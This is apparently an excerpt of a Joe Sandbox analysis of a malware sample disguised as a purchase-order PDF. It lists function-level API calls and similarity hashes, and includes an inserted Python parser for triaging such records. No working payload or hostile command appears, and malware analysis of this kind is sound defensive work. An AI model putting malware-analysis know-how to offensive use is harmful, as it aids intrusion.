                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4023252218-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                                                                            • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1489400265-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
• Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
• Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
APIs
  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
• String ID:
• API String ID: 1042038666-0
• Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
• Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
• Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
• Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
• Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
• Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
• Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 132634196-0
• Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
• Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
• Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
• Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00415620
• CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
• __freeptd.LIBCMT ref: 0041563B
• ExitThread.KERNEL32 ref: 00415643
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3798957060-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 00415690
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 0041569B
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004156AD
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
• ExitThread.KERNEL32 ref: 004156BD
• __freefls@4.LIBCMT ref: 004156D9
• __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 1537469427-0
• Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
• Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
• Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
• Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _malloc
• String ID: Default$|k
• API String ID: 1579825452-2254895183
• Opcode ID: 6fe3f9203900dd1d6840f0fd3b032152994fd8d3dc3e6350640fe2dbd5355632
• Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
• Opcode Fuzzy Hash: 6fe3f9203900dd1d6840f0fd3b032152994fd8d3dc3e6350640fe2dbd5355632
• Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
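The per-function records in this section (APIs, Memory Dump Source, Similarity) are easier to triage and pivot on once parsed. The following Python is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses records laid out as above, separates a function's own calls from the nested "Part of subcall function" entries, lists the Win32 APIs a function calls directly, and extracts the Similarity fields a cross-sample search would key on. It assumes that any call resolved to LIBCMT is statically linked C runtime code rather than behaviour of the sample; that is an assumption of this example, not a statement from the report. The sample input is a constructed excerpt of two records from this page, the second trimmed to a subset of its subcall lines.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source / Similarity)."""
import re
from dataclasses import dataclass, field

SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One API bullet, optionally nested under "Part of subcall function <addr>:".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
SOURCE_RE = re.compile(r"^\s*•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-F]{8})")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str        # LIBCMT (static CRT) or a Win32 DLL such as KERNEL32
    ref: str           # call-site address as printed in the report
    parent: str = ""   # caller address for "Part of subcall function" entries


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    offset: str = ""
    similarity: dict = field(default_factory=dict)


def parse_records(text: str) -> list:
    """A record ends at its 'Instruction Fuzzy Hash' line, the last Similarity field."""
    records, current, section = [], FunctionRecord(), None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in SECTION_HEADINGS:
            section = stripped
        elif section == "APIs" and (m := API_RE.match(line)):
            current.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["parent"] or ""))
        elif section == "Memory Dump Source" and (m := SOURCE_RE.match(line)):
            current.source_file, current.offset = m["file"], m["offset"]
        elif section == "Similarity" and (kv := KV_RE.match(line)):
            key = kv["key"].strip()
            current.similarity[key] = kv["value"].strip()
            if key == "Instruction Fuzzy Hash":
                records.append(current)
                current, section = FunctionRecord(), None
    return records


def direct_calls(rec: FunctionRecord) -> list:
    """Calls made by the function itself, excluding nested subcall entries."""
    return [a for a in rec.apis if not a.parent]


def win32_imports(rec: FunctionRecord) -> list:
    """Directly called Win32 APIs. Assumption of this example: anything resolved
    to LIBCMT is statically linked CRT code, not behaviour of the sample."""
    return [a.name for a in direct_calls(rec) if a.module != "LIBCMT"]


def pivot_keys(rec: FunctionRecord) -> dict:
    """Similarity fields worth carrying into a cross-sample search."""
    return {k: rec.similarity.get(k, "") for k in ("API String ID", "Opcode ID", "Instruction Fuzzy Hash")}


# Constructed input: two records copied from this report's layout, the second
# trimmed to a subset of its subcall lines.
SAMPLE = """APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00415620
• CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
• __freeptd.LIBCMT ref: 0041563B
• ExitThread.KERNEL32 ref: 00415643
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID:
• API String ID: 3798957060-0
• Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
• Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
APIs
• ___set_flsgetvalue.LIBCMT ref: 00415690
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
• ExitThread.KERNEL32 ref: 004156BD
• __freefls@4.LIBCMT ref: 004156D9
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 1537469427-0
• Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.offset, win32_imports(rec), pivot_keys(rec))
```

Both records shown here resolve their direct calls to either LIBCMT or KERNEL32 thread-teardown routines, so `win32_imports` returns only `CloseHandle`/`ExitThread` and `GetLastError`/`ExitThread`; functions whose direct Win32 calls go beyond that set are the ones worth opening first, and `pivot_keys` gives the fields to search other reports for.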
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _memcmp
• String ID: '$[$h
• API String ID: 2931989736-1224472061
• Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
• Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
• Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
• Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _strncmp
• String ID: >$R$U
• API String ID: 909875538-1924298640
• Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
• Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
• Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
• Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
APIs
